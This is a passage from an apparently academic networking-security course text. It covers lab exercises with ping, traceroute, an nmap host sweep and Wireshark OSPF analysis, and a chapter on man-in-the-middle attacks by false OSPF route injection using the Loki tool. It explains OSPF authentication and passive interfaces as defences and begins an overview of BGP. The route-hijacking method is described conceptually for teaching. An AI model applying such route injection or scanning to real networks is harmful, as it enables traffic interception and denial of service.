Label part d) of your network diagram with the IP address belonging to the eth0 interface of the webserver
www.usna.edu.
4. How Do I Get There?
There are two methods to discover information about the path between you and the webserver www.usna.edu. The first
method is the utility ping with record route. It will tell you the IP addresses of the OUTGOING interfaces along the way to
and from the final destination.
367
Figure 3 – Example use of ping with record route option.
For example, in Figure 3, after the command
ping –R –c1 –n 2.2.2.15
is executed, the OUTGOING interfaces are listed in order beginning with:
1) 3.3.3.5
2) 2.2.2.1
3) 2.2.2.15
– the host computer’s interface.
– Router A’s eth1.
– the webserver’s interface.
The OUTGOING interfaces of the return trip are listed in order beginning with:
4) 2.2.2.15
5) 3.3.3.1
6) 3.3.3.5


– the webserver’s interface.
– Router A’s eth0.
– the host computer’s interface.
Identify the IP addresses of the interfaces traversed between you and the webserver www.usna.edu using the ping
command (do not forget the –R and –c1 and –n options).
Label parts e) through g) of your network diagram.
The second method is the utility traceroute, which works similar to ping, except it tells you the address of the
INCOMING interface along the path between you and your destination. For example, in Figure 4 on page 369, after the
command
traceroute –n 2.2.2.15
is executed, the INCOMING interfaces are listed in order beginning with:
1) 3.3.3.1
2) 2.2.2.15

– Router A’s INCOMING interface.
– the webserver’s interface.
Execute a traceroute to the webserver www.usna.edu (do not forget the –n option).
Question 2: Compare your traceroute results with your network diagram. Did they match the expected results obtained
from the ping command?
368
Figure 4 – Example of traceroute command.
5. Is Anyone Else Out There?
Routers B and C are also present in this virtual world and are responsible forwarding packets between the networks they are
connected to and learning about other networks from other routers. Recall from Lecture #15 that routers learn about each
other’s networks by using a routing protocol such as the Open Shortest Path First (OSPF) protocol. In OSPF, routers use
Link State Packets (LSPs) to communicate with each other and learn about the network topology. Let’s take a closer look at
this communication.
 Launch Wireshark (as root) by selecting Applications, Internet, Wireshark (as root) from the system toolbar at the
top of your virtual machine.

Open the packet capture labeled sx15 in the ec310code folder in your home directory.

Examine the captured OSPF hello packets in the packet details pane. Be sure to expand the OSPF Header and
the OSPF Hello Packet portions (see the figure at the top of the next page for reference). These packets were
captured from one of the routers in your virtual world.
369
Recall from Lesson 15 that in OSPF routers send Hello Packets at a specific interval in order to let other routers know they
are alive. This interval is called the Hello Interval.
Question 3: Using the information in the captured Hello Packets, what is the Hello Interval for the router they were
captured from? Verify the Hello Interval by observing the amount of time between two OSPF hello packets in your
packet capture. Is it equal to the Hello Interval?
If after a certain amount of time a router does not receive a Hello Packet from another router it deems that router to be ‘dead’
and removes all routes that were advertised by that router. The time duration before a router is declared dead is known as the
Dead Interval. This allows OSPF to respond well to dynamic changes in the network topology.
Question 4: What is the Dead Interval for the router’s captured Hello Packets? If you could stop a router’s hello
packets from being advertised, would you disable that router?
Hello Packets also serve the important function of beginning a neighbor association between two routers when they first
meet. Before the new routers agree to swap routing information they must agree on a basic set of parameters and become
neighbors first. A router begins this process by identifying itself in the OSPF Header of the packet under the Source
OSPF Router field.
Question 5: Look inside the OSPF Header of the captured Hello Packet. What IP address is listed in the Source OSPF
Router field (note: this IP address does not begin with 192.168.65.XX)?
This is IP address is very important. It is known as the Router’s ID and uniquely identifies this router to all other routers.
Who is responsible for assigning IP addresses anyway? The network administrator is responsible for assigning IP addresses
among many other tasks in maintaining the network. They assign blocks of IP addresses as part of the design of the network
architecture to best meet the needs of their clients.
What are the routers talking about with each other and why do they need to communicate so often? There are a number of
internal measures routers use in order increase efficiency and prevent unnecessary information from clogging up the network,
such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSU).
To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.
6. Could Anyone Hurt Me?
Lastly, an evil instructor (because aren’t all instructors evil?) is also present in this virtual world. He or she is located on the
5.5.5.0/25 network and your final task is to find him or her. nmap is powerful utility which allows us to scan networks
and identify which hosts are active among many other useful tasks.
 Execute the command below to scan the 5.5.5.0/25 network and determine which hosts are ‘up’ (i.e., active). It
may take a few minutes.
nmap –sP 5.5.5.0/25

Use traceroute or ping to identify the path to each of the hosts identified as ‘up’ by nmap.
Question 6: Using your network diagram and the results from traceroute or ping, what is the most likely IP address of
the evil instructor?




Confirm the IP address identified with your instructor or lab technician.
Label part h) of your network diagram.
Use traceroute or ping to verify the interfaces between you and the evil instructor.
Label parts i) through k) on your network diagram.
370
7. Clean Up

VMware Workstation
o
In the VMware Workstation menu click VM and Settings.
o
Select Network Adapter and ensure that Connected, and Connected at power on, are unchecked, and
ensure that Host-only: A private network shared with the host is selected or checked, then click OK.
o
Suspend your Cyber2 VM. Disconnect the blue Ethernet cable. Turn on your wireless adapter.
371
372
Security Exercise 15 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
373
RA, eth3,
c)
___.___.___.___
4.4.5.0/24
SX#16 Only
Evil Instructor
___.___.___.___ /___
m)
www.usna.edu
___.___.___.___
RC, eth4,
f)
web, eth0,
d)
RC
4.4.4.0/24
4.4.4.1
___.___.___.___
RB
___.___.___.___
___.___.___.___
2.2.2.0/29
RA, eth4,
RA, eth5,
e)
i)
RB, eth3,
___.___.___.___
1.1.1.0/29
RB, eth2,
RA
___.___.___.___
RC, eth5,
EC310 Security Exercise 15 & 16
RC, eth3,
g)
___.___.___.___
j)
k)
___.___.___.___
___.___.___.___ /__
b)
MID, eth1,
a)
EC310 MID
___.___.___.___
5.5.5.0/25
EVL, eth0,
h)
374
Chapter 16: The Man-In-The-Middle Attack
Objectives:
(a) Describe the Man-In-The-Middle (MITM) attack and list what advantages it provides the attacker.
(b) Construct a routing table based on a network diagram and manipulate a routing table to exploit a specific target.
(c) Describe the steps that should be taken to prevent false route injection and identify who is responsible for performing these
preventative actions and how they can be applied.
I. Trust
1. A Quick Review Where are we at in our understanding of how networks interconnect? We’ve talked about routing
algorithms and how these weird things called routing tables are constructed; we’ve talked about the layers and protocols
involved in networking; we’ve also talked about addressing schemes and specifically how MAC addresses and IP addresses
are used; but, what is the point of all this?
Much like the host section in the first six weeks of EC310, we need to understand how networks work before we can manipulate
their operation and violate the principles of security. Much like a locksmith, once we understand how a lock operates, we know
that a key is not the only thing that can open a door.
If we are thinking like a locksmith about networks from a security perspective, what is the underlying assumption between
routers in the routing algorithms they use to construct their routing tables?
The assumption is that each router can trust the information that other routers are sending it.
That is, Router A assumes by default that Router B is telling the truth about the state of its links or the distance between it and
other routers.
But what happens when that is not the case? Would a machine ever lie to another machine? Are there evil machines out there
that want to do bad, mean, horrible things to people?
Gasp, what if it was true! Have you ever seen Terminator 2: Judgment Day!?
Sadly, most of your classmates were not born when this movie released, but I highly recommend it for your Netflix queue.
You will not be able to call yourself a hacker until you watch it.
375
Practice Problem 16.1
Consider the network below. How would the routing tables evolve using distance vector routing?
Router A
Next
Destination Hop
B
B
C
C
D
-
Cost
4
5
∞
Router B
Next
Destination Hop
A
A
C
D
D
Router C
Next
Destination Hop
A
A
B
D
D
Cost
4
∞
2
Cost
5
∞
2
Router D
Next
Destination Hop
A
B
B
C
C
Cost
∞
2
2
Everyone shares its table with its neighbors.
Solution:
But what if Router C was evil and began to falsify information about its link to Router A; how would the routing table
change?
Router A
Next
Destination Hop
B
B
C
C
D
-
Cost
4
5
∞
Router B
Next
Destination Hop
A
A
C
D
D
Router C
Next
Destination Hop
A
A
B
D
D
Cost
4
∞
2
Everyone shares its table with its neighbors.
Solution:
What does this mean for all of Router D’s traffic destined for Router A?
More importantly, why would Router D’s traffic go through Router C instead?
376
Cost
1
∞
2
Router D
Next
Destination Hop
A
B
B
C
C
Cost
∞
2
2
Fortunately, machines cannot lie to one another, but the humans that operate the machines do lie (or make mistakes) and can
force the machines to do the same.
In the previous example, we saw how a simple lie about the distance between two routers could change the direction of traffic
flow within the network, but why is this of concern? Even with this manipulation, if Router D wanted to send packets to
Router A, won’t the information be delivered just as before? (note that only Router D is fooled by Router C’s lie. Router
A’s table is not affected by Router C’s lie and it will still route to Router D via Router B with a total cost of 6. This is
because Router A knows its distance to Router C.)
Hi, remember me? I’m Ciana.
No. Now that Router C is in the middle of Router D and Router A, it can:
1. Observe the traffic moving between these devices.
2. Change the information moving between these devices.
3. Stop the traffic from moving between these devices.
Why is this an issue? Recall from SI110, there are five pillars of information assurance we want
to preserve when offering services through routers and other information systems. 26
1. Confidentiality – protection of information from disclosure to unauthorized
individuals, systems, or entities.
2. Integrity – protection of information, systems, and services from unauthorized
modification or destruction.
3. Availability – timely, reliable access to data and information services by authorized
users.
4. Non-repudiation – the ability to correlate, with high certainty, a recorded action with
its originating individual or entity.
5. Authentication – the ability to verify the identity of an individual or entity.
Grr…Don’t remember me,
huh? You’d better for the test!
Practice Problem 16.2
What primary pillar of information assurance is violated in each thing Router C can do once it is in the middle of Router D and
Router A?
(a) The ability to observe traffic violates:
(b) The ability to change traffic violates:
(c) The ability to stop traffic violates:
2. The Man-In-The-Middle (MITM) Attack
This type of problem is called the Man-In-The-Middle attack.
We have seen this once already in Chapter 14. Specifically, the technique used to conduct the MITM attack in Chapter 14
was called ARP-Spoofing because to redirect another computer’s traffic on a single network required your computer to tell a
specific lie about the association between its
MAC address
and
IP address
Much like a nasty rumor in the Brigade, that lie had to spread around for it to be effective. Similarly, you included your own
MAC address with the target’s IP address through multiple unsolicited ARP-Replies to convince everyone on your local
network that your machine was the target host. Finally, everyone on your local network had to believe your lie for you to
begin receiving packets destined for the target machine.
Do you think it is possible for something like this to happen on a bigger scale? That is, instead of a Man-In-The-Middle
attack on one network as with ARP-spoofing, can this happen between multiple networks?
26
See http://www.usna.edu/CS/si110/lec/l00/lec.html to review these topics and definitions.
377
Yes it could happen, and things similar to this have already happened, but to understand how requires a bit more
understanding of the how networks interconnect. However, just as before with ARP-Spoofing, there are four critical steps
that must occur for an attacker to make this possible.
1. Take control of a machine on the network and manipulate its operation.
2. Force the machine to tell the “right” kind of lie.
3. Force the machine to spread the lie around.
4. Force other machines to believe the lie.
3. Wait a Minute…
“Boring! Okay, so I may not remember
much from SI110, but the one thing I do
remember is that encryption solves all of
our problems. If someone is snooping
around and reading my packets, then I
will just encrypt them and ruin their
ability to influence my communication.
Done, may I go now?”
As Mr. Eric Snowden recently revealed, that
is exactly what the National Security Agency
(NSA) and others would want you to think. 27
While it is true that encryption may make
eavesdropping harder for the man in the
middle, it is not insurmountable. In reality, as
the New York Times explains, some of the
core encryption protocols of the Internet are
already broken. For those that are not, the
NSA allegedly spends upwards of $250
million a year on US and foreign industries to
covertly influence commercial product
designs to make them exploitable. To
leverage this advantage, the NSA pays a
significant amount of money to become the
man in the middle so they can read any
Internet traffic, encrypted or not. One
example from WIRED magazine talks about a $652 million NSA project to help take control of routers and networks to
monitor foreign communications.28 Hopefully, it is clear that understanding how a MITM attack can take place across
multiple networks is very important to Cyber Warfare as a whole.
Yes, sir! Please give me more details
so that I can understand this critically
important material.
II. A Closer Look at How Networks Interconnect
1. An Important Example
Let’s say there is an important website that all midshipmen need to access to in order to
prepare for EC310 each day. That website is located at IP address 4.4.5.155 on the network 4.4.5.0/24. The
27
28
See http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?pagewanted=1&_r=2&
See http://www.wired.com/threatlevel/2013/09/nsa-router-hacking/)
378
midshipmen who need access to it are located on network 192.168.65.0/24, and have one of the 253 available host IP
addresses assigned to their laptops.
379
Practice Problem 16.3
Construct the routing table for Router A.
Now, let’s pretend there is an evil instructor (because aren’t all instructors evil?) located on the 5.5.5.0/25 network that
wants to prevent students from reaching the EC310 website at 4.4.5.155. What would that instructor need to do in order
to make the student’s traffic go to some place they did not intend?
380
a) First, the instructor will need to: take control of a machine on the network and manipulate its operation.
Being an instructor, ITSD has graciously allowed him (or her) privileged access to his office computer for ‘academic
research’, but nowhere else. ITSD has restricted the instructor’s privileged access in order to prevent him from making any
changes that could affect other computers on the network. Therefore, the instructor will need to manipulate his computer in
such a way where it can alter the flow of traffic across the networks and deny midshipmen access to the course website. To
accomplish this, he decides to turn his computer into a router using a special software tool called Loki.29 This tool ‘speaks’
the Open Shortest Path First (OSPF) protocol, which will enable the injection of false routing information into the
networks.
b) Second, the instructor will need to: force his router to tell the “right” kind of lie.
29
Loki is a Python based framework implementing many packet generation and attack modules for Layer 3 protocols. It was
developed by ERNW, an IT security service provider, in 2010. See https://www.ernw.de/research/loki.html for more details.
381
But what is the “right” kind of lie to tell? Well, that depends on the effect the instructor wants to have on the networks. For
example, if the instructor wanted to cause a panic across the entire Brigade, he or she might say that “buffalo chicken
sandwiches will no longer be offered in King Hall.” However, if he only wanted to terrorize the students in his EC310
section, the instructor could say “you will have a quiz tomorrow over Lessons 1 through 15 worth 99.2003% of your final
grade.”
The instructor’s goal is to stop the students’ traffic from reaching the EC310 web server located at 4.4.5.155. To do this
the instructor would like to direct the students’ traffic to a different location where their web requests will go unanswered.
Knowing that routers transmit information to the destination that matches the longest network prefix in their routing table,
the instructor decides to create a false network from his router with a more specific network ID that will direct the
student’s traffic away.
Practice Problem 16.4
What is the first and last IP address of the 4.4.5.0/24 network where the webserver is located?
(a) First Address:
(b) Last Address:
Looking at Router A’s table, what network ID and mask should the evil instructor choose? Other options?
What is the first and last address of the false network the evil instructor will advertise?
(a) First Address:
(b) Last Address:
Does the IP address of the webserver fall within the IP address block that the evil instructor will advertise?
c) Third, the instructor will need to: force his router to spread the lie around.
Recall from Lesson 15, under the Internet’s Open Shortest Path First (OSPF) protocol, routers communicate with one
another using Link State Packets (LSP). These packets are distributed to all routers through “controlled flooding” to allow
each router to build a full and complete picture of the topology of the entire network. However, before routers swap LSP
with each other, they must become neighbors first and agree on a basic set of operating parameters. Therefore, in order for
the evil instructor to spread his lie about the fake network he must become neighbors first with a router on his network.
Then he can send his malicious LSP advertising the false network he is connected to.
d) Fourth, the instructor will need to: force the other routers to believe the lie.
382
Fortunately for the attacker in OSPF this is relatively easy because controlled flooding is already built into the protocol. As
previously mentioned, LSP are forwarded to all routers through controlled flooding to ensure all routers have a complete
picture of the network’s topology. Thus, once Router B learns about the new false network from the evil instructor, Router B
will turn around and tell Routers A and C.
Practice Problem 16.5
What will Router A’s routing table look like, once it hears the lie about the fake network from Router B?
Thus, whenever a student sends a packet destined for the webserver at 4.4.5.155, where will Router A forward their
packet? Will the EC310 students ever be able to reach the course web page?
Do you think it is possible that something like this could ever happen on the Internet? Unlike the previous example, the
Internet consists of hundreds of thousands of networks stretched across the entire globe. Could it be possible for someone to
change the way traffic flows across such a big and complex distributed system?
383
Yes it could happen, and similar things like this have already happened, but to understand how requires a bit more understanding
of the Internet first. Specifically, we need to understand the fundamental protocol of the Internet, the Border Gateway Protocol
(BGP). That is, before we can become a locksmith (of the Internet), we need to know a bit more about how the lock (the
Internet) operates.
2. Protection Against False Route Injection
How can we stop such malicious behavior? Recall that by default routers trust the information other routers are sending, but
this does not have to be the case. The Open Shortest Path First protocol has two authentication mechanism built in to protect
against false route injection. The first is a simple plaintext-password added to all LSPs so each router can authenticate the
information it is receiving. If a router sends a LSP without the appropriate password, then the LSP is rejected.
The second method is an MD5-hash of the OSPF packet and a shared secret key. Recall from SI110, that hashing is a
‘one-way’ encryption technique that produces the same message digest (i.e., encrypted output) given the same input string.
Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest
(remember the Rubik’s cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with
their LSP to authenticate themselves with other routers. Of course, all routers must know the shared secret key in advance.
This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services where there
are literally thousands of routers.
Lastly, separate from these two authentication mechanisms, most implementations of OSPF allow for creation of passive
interfaces. Just like when your roommate starts getting on your nerves and you tune him or her out by putting your
headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the
router will ignore all routing information being sent over that interface. However, this requires network administrators to
make smart decisions when setting up the topology of their networks and configuring their routers.
Practice Problem 16.6
Briefly describe two technical solutions to protect against false route injection and identify who is responsible for implementing
them.
Solution #1:
Solution #2:
OPTIONAL:
Interestingly, of the three actions an attacker can take during a MITM attack, what do you think an attacker would most likely
want to do? Observe, change, or stop your traffic? It seems frightening to have our traffic stopped by someone else or changed
as it is moving to its destination, but recent cyber activity has indicated it is more likely an attacker would want to observe your
traffic in the end. Consider the following excerpt from Kevin Mandiant’s report on Advanced Persistent Threat 1 (APT1), a
Chinese cyber warfare unit:
Our evidence indicates that APT1 has been stealing hundreds of terabytes of data from at least 141
organizations across a diverse set of industries beginning as early as 2006. Remarkably, we have witnessed
APT1 target dozens of organizations simultaneously. Once the group establishes access to a victim’s network,
they continue to access it periodically over several months or years to steal large volumes of valuable
intellectual property, including technology blueprints, proprietary manufacturing processes, test results,
business plans, pricing documents, partnership agreements, emails and contact lists from victim
organizations’ leadership. We believe that the extensive activity we have directly observed represents only a
small fraction of the cyber espionage that APT1 has committed.
Once APT1 has compromised a network, they repeatedly monitor and steal proprietary data and
communications from the victim for months or even years. For [141] organizations... we found that APT1
maintained access to the victim’s network for an average of 356 days. The longest time period APT1
maintained access to a victim’s network was at least 1,764 days, or four years and ten months. APT1 was
not continuously active on a daily basis during this time period; however, in the vast majority of cases we
observed, APT1 continued to commit data theft as long as they had access to the network. 30
Notice the chosen behavior of this Chinese cyber warfare unit. Rather than shut down the networks of the various companies
they invaded or change the information located there, they simply observed the traffic and stole copies for themselves. It would
seem their primary desire was not to do damage but to gain information.
30
See http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf for the full report on APT1 originally published in 2013.
384
Problems
1.
What is the underlying assumption between routers in the routing algorithms they use which makes it possible to
conduct a Man-In-The-Middle (MITM) attack?
2.
What three things can an attacker do to your network traffic in a Man-In-The-Middle (MITM) attack and what pillar
of Information Assurance is affected during each?
3.
Sketch the routing table for Router C for the network shown on page 420.
4.
An attacker is located on the 5.6.7.0/24 network and wants to prevent midshipmen from reaching a website at
8.8.8.26. He turns his computer into a router using Loki to advertise a false network to Router C.
(a) Construct the routing table for Router C. Use the template shown below:
(b) Looking at Router C’s routing table, what network address and mask should the attacker choose? In answering
this question, complete the table below.
385
(c) Complete the routing table entry below with your answer from (b) and draw a line into Router C’s routing table
showing where the attacker’s false network would go.
(d) What is the first and last IP address of the false network you chose for the evil instructor?
(e) Does the IP address of the webserver fall within your choice for the evil instructor’s false network?
(f) Given your answer to part (e), whenever a midshipman sends a packet destined for the webserver at 8.8.8.26
where will Router C forward their packet? Will the midshipman ever be able to reach the important website?
(g) List and briefly describe two technical solutions that could be implemented on Router C to prevent the evil
instructor from injecting false routing information.
(h) Who is responsible for implementing these security measures in a network?
5.
What does a router assume by default when another router sends it information about the state of its links or the
distance between it and other routers?
6.
An attacker is located on the 3.4.5.0/25 network and wants to prevent midshipmen from reaching a website at
8.9.7.96. The network is depicted below. He turns his computer into a router using Loki and advertises a false
network of 8.9.7.80/28 to Router A.
8.9.7.96
RA, eth1,
8.9.7.65
RA, eth0,
RB, eth0,
8.9.7.64/26
1.2.3.1
1.2.3.0/24
1.2.3.10
3.4.5.1
RB, eth1,
3.4.5.0/25
EVL, eth0,
3.4.5.32
8.9.7.80/28
386
7.7.7.1
Internet
RB
RA
RA, eth2,
8.9.7.66
(a) Fill in the blanks in the table below to complete Router A’s routing table.
(b) In the line provided below Router A’s routing table, fill in the false route the attacker would inject.
(c) Draw a line from the false route pointing to the location in which it would be injected into Router A’s routing
table.
(d) Will the attacker be successful in redirecting the midshipmen’s traffic? Justify your answer.
(e) List and briefly describe two technical solutions that could be implemented on Router A to prevent the attacker
from injecting false routing information.
(f) Who is responsible for configuring these security measures on Router A: the Network User, the Network
Administrator, the Network Hardware Manufacturer or the Network Programmer?
387
388
Security Exercise 16
Introduction
It is interesting to hear the theory behind a Man-In-The-Middle attack, but it is better to experience it yourself.
1. Set-Up
Equipment required:
 Your issued Laptop.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
 Your completed network diagram from SX#15 and a printed copy of this security exercise.
o Separate the answer sheet and have it ready to fill in.
 VMware Workstation
o Power on your Cyber2 VM, then click VM and Settings.
o
Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected
directly to the physical network, and Replicate physical network connection state are selected or checked,
then click OK.
o
Open a terminal in your Cyber2 VM and execute the command
sudo dhclient
Once it finishes, execute the command
ifconfig
You screen should look similar to Figure 1 on page 390. Interface eth1 should be assigned an IP address
of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 100 and 199.
If not, notify your instructor or lab technician.
389
Figure 1 – ifconfig executed after initial lab setup.
Part 2: The Evil Instructor
1. The Attack
The evil instructor wants to deny you access to www.usna.edu. Just like you discovered in SX#15, he has found the IP
address for the website and understands that routers work using the longest mask matching principle. He also understands
the default assumption between routers in the routing algorithms they use to construct their routing tables.
Let’s start by verifying the correct website.
 use traceroute –n to identify the route to www.usna.edu.
 access www.usna.edu using Firefox to verify the name of the site administrator
Question 1: What is the assumption the evil instructor understands about routers in the routing algorithms they use?
STOP! Observe Demonstration #1



When directed, label part m) of your network diagram.
When directed, use traceroute to identify the new route to www.usna.edu.
When directed, access www.usna.edu using Firefox. If already open, refresh your browser using either method
below.
Ctrl + Shift + R
or
Shift +
Question 2: After the evil instructor injected false routing information into the network, where did your traffic destined for
www.usna.edu go? Was the website still available?
Question 3: What did your evil instructor attack in order to deny you access to www.usna.edu? Pick one.
a) your virtual machine
b) the Webserver
c) a script running on the webpage
d) the network
Question 4: What pillar of information assurance did this affect?
STOP! Observe Demonstration #2

When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
390
Shift +

When directed, use traceroute identify the new route to www.usna.edu.
Question 5: Who maintains the website at www.usna.edu?
It may not seem very significant to have your homework interrupted or altered by a Man-In-The-Middle attack, but what if
the website you were visiting was more important? For example, what if you needed to check on the status of your second
class loan with your bank?
STOP! Observe Demonstration #3

When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
Shift +
Question 6: What fake website did your evil instructor misguide you to and what pillar of information assurance did this
affect?
Recall from SI110, that the X.509 certificate system provides a mechanism to establish a secure connection with a website. It
provides assurance between a website’s domain name and their public key. That is, when the lock closes in our browser (
) and we establish a secure connection with a website, we know the public key that was used to transfer a
symmetric encryption key was done using the public key which belongs to a particular domain name.
Question 7: If the X.509 certificate system only offers proof that a public key belongs to a specific domain name, whose
responsibility is it to verify if a website is authentic?
2. The Fix #1: Easy as 123456
Recall from Lesson #16, the Open Shortest Path First (OSPF) protocol has two authentication mechanism built in to protect
against the injection of false routing information. The first is a simple plaintext-password added to all Link State Packets
(LSPs) so each router can authenticate the information it is receiving. However, by including the password in plaintext with
each LSP, you can easily discover the ‘secret’ password by observing the LSPs with Wireshark. This is similar to how you
discovered the victim’s password in SX#14.
Much more interesting is the second method for authentication in OSPF, an MD5-hash of the OSPF packet and a shared
secret key. Recall from SI110, that hashing is a ‘one-way’ encryption technique that produces the same message digest (i.e.,
encrypted output) given the same input string. Additionally, while it is easy to hash the input string, it is very hard to identify
the input string given only the message digest (remember the Rubik’s cube?). In OSPF, routers can send the hash of the
OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers. Of course, all
routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a
place like Google or Amazon Web Services where there are literally thousands of routers.
Question 8: We have all been told to change our password regularly to increase security, but do you think it is easy to change
the shared secret key in every router at a place like Google or Amazon (or even the Naval Academy)? Do you think there
may be an incentive for network administrators to make the shared secret key something easy to remember?
STOP! Observe Demonstration #4

When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
Shift +
Question 9: What are some important things to consider when choosing a password?
3. The Fix #2: Passive Aggression
Consider the topology of your network diagram from a security perspective.
Question 10: Is there any reason Router B should listen to routing information being sent over interface eth2?
Most implementations of OSPF allow for creation of passive interfaces. Just like when your roommate starts getting on your
nerves and you tune him or her out by putting your headphones on, routers can do the same thing. Once a network
administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that
interface. However, this requires network administrators to make smart decisions when setting up the topology of their
networks and configuring their routers.
391
STOP! Observe Demonstration #5
Question 11: How many OSPF Hello packets did your instructor receive once the passive interface was enabled?
Question 12: As a user who do you trust by default for the safe and effective administration of your network? Do you have
the ability to control the security of the network on your own?
4. Clean Up

VMware Workstation
o
In the VMware Workstation menu click VM and Settings.
o
Select Network Adapter and ensure that Connected, Connected at power on, and NAT: Used to share the
host’s IP address are not selected or unchecked, then click OK.
o
Suspend your Cyber2 VM.
o
o
Disconnect the blue Ethernet cable.
Turn on your wireless adapter.
392
Security Exercise 16 Answer Sheet
Name:
Router A’s Routing Table
Mask
Network Address
Next-Hop Address
Interface
/0
0.0.0.0
Default
eth5
False Route Injection
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
393
Question 11:
Question 12:
394
Chapter 17: Border Gateway Protocol
Objectives:
(a) Discuss the major concerns with the use of a single protocol for the Internet.
(b) Describe the various autonomous system categories.
(c) Utilize path attributes to determine the path of a packet across ASes
(d) Demonstrate the ability to state the BGP announcements that would be made given an internet diagram.
I. Internet Structure
Up to this point, all we’ve looked at are a small set of Local Area Networks (LANs) which have been connected together
through a limited number of routers. As an example, consider the network topology discussed in Chapter 16. It was comprised
of only a few small networks and a few routers which facilitated access to a single webserver.
This group of networks would be easily manageable by one organization, but this network is not representative the Internet
today. Today’s Internet comprises thousands of networks managed by a countless number of different people spread across
the entire globe. But how did the Internet become so big, and what did the Internet look like when it first began?
1. The Internet of Old
It used to be that the structure of the Internet was like that of a tree, one central trunk (aka. the backbone) that fed to all the
other downstream entities. The picture below shows the Internet circa 1990. End users (such as Stanford and UNM in the
figure) connected to "service providers" (such as Westnet regional) which in turn connected to a single backbone. Recall from
Security Exercise 14 that the single backbone, circa 1990, was funded by the National Science Foundation—hence the name
"The NSFNET backbone".
Peterson and Davie, Computer Networks, A Systems Approach, Morgan Kaufmann, 2007
395
We also learned in Security Exercise 14 that the Internet evolved over time. Multiple companies offered to provide backbone
services, and gradually the original tree-like structure (with a single backbone) was replaced by a multi-backbone structure.
Additionally, multiple networks oftentimes decided to connect directly together, avoiding the backbone altogether. The
companies providing backbone services also recognized the utility in connecting the backbones together.
2. Today’s Internet
Representation of Today’s Internet Structure
Today there are several backbones run by different private corporations and governments to provide global connectivity. You
may even recognize some of these backbones. They are key communication players like:
AT&T, Sprint, Level 3 Communications, Verizon, and others…
Much of the Internet's traffic is eventually routed through at least one backbone. Thus, a particular backbone can manipulate
the traffic that goes through it. Recall from Chapter 11 that we saw several examples of how this power was abused through
error or malicious intent to observe, change or stop the flow of traffic across the Internet. Specifically, you learned how
YouTube was brought down by the actions of the Pakistan Telecom Authority on February 4 th, 2008.
But, for now, let’s understand a bit more about how these backbones interconnect.
The backbones are interconnected by peering points that allow connectivity between the backbones. These peering points
(Internet Exchanges) are voluntary connections between different networks which increase redundancy and capacity. Although
competitors, backbone providers desire these peering arrangements just in case one backbone is suddenly asked to deliver more
traffic than it is capable of (in which case it can send the excess to a competitor) or in case one backbone is knocked offline
completely.
The provider networks use the backbones for global connectivity, and, in turn, the customer networks utilize the services of
the provider networks. Any of the three (the backbones, the provider networks, or the customer networks) can provide services
(although at different levels) and can be called Internet Service Providers (ISP).
Note some of the complexities in the figure above. For example, customer networks can connect to two (or more) different
provider networks in order to increase redundancy. Provider networks can connect directly to two (or more) backbones, again
for redundancy. Additionally, provider networks can connect directly to peering points within an Internet Exchange.
396
Still, though, the picture of the Internet above is a cartoonish oversimplification. Consider the picture of the Internet shown
below, noting the small inset that is expanded. 31
Image of a small grouping of networks
within the Internet
An
Aside
The structure of the Internet has as much to do with money and politics as it does
with technology. Consider the fact that the backbones are run by companies such as
AT&T, Sprint and Verizon. Why them? These companies had the regulatory rightof-way clearance (i.e., the legal permission) to run long-distance cable across the
country, and the finances to support the operation.
You may wonder about those peering points—why would a company agree to allow
a competitor the option of using their backbone network? Well… consider what the Internet would look like without
peering points! We would not have a single Internet—we would have an AT&T Internet, a Sprint Internet, a Verizon
Internet, etc. That would cause more problems for everyone. Using peering points allows connectivity between the
backbones, preserving the operating idea of a single network.
A major peering point is the networking equivalent of one of those Paris traffic circles: a huge amount of traffic,
very busy, very high speed, somewhat mind boggling. The Border Gateway Protocol which we discuss in this
lecture implements orderly negotiation among the peering, bringing some order to that chaos.
3. Inherent Problems with a Single Routing Protocol
As of December 31, 2013, there were 7.2 billion people in the world, of which 2. 8 billion were Internet users.32 All of these
users collectively produce a gargantuan amount of network traffic, which traverses many, many networks (with many, many
31
For an alternative view of the Internet, arranges in a spherical shape, see
http://www.technologyreview.com/news/408104/mapping-the-internet/ .
32
http://www.internetworldstats.com/stats.htm
397
interconnecting routers). With all these users and devices, there is no way that routing on the Internet can be accomplished
using a single protocol. There are two major issues that prevent the use of a single global routing algorithm on the Internet:
a.
Scalability:
Can you imagine the size of the routing tables each router would have to maintain? Routing tables would become—
what's the word… behemothic? These elephantine routing tables would mean that:
1) Searching for a destination would be extremely time consuming; and
2) Updating such unwieldy tables would create excessive amounts of needless traffic.
b.
Administration:
Even if we could manage the scalability issue, a larger issue concerning network administration looms before us.
We have described two different routing methodologies: link state routing and distance vector routing. Both
approaches model the underlying network as a graph, where the routers comprise the nodes of the graph, and an edge
is drawn between two routers if the routers are directly connected. Recall that each edge in the graph has a weight
associated with it. Both of the routing approaches seek to determine a route from a source (say Router A) to a
destination (say Router B) that has a minimum total weight. For example, if the weights on the graph edges represent
cost, the algorithms will determine the minimum cost route from A to B. If, on the other hand, the weights represent
time delay, then the algorithms will determine the minimum delay route (i.e., the fastest route) from A to B.
You may have already noticed a problem with this approach to routing. Suppose Provider Network X owns and runs
a network that comprises a large number of routers (and interconnecting edges). Suppose that Provider Network Y
also owns and runs a network that comprises a large number of routers and edges. Suppose the networks for both
Provider Network X and Provider Network Y are connected to the global Internet, as shown in the figure on page 396.
So far, so good.
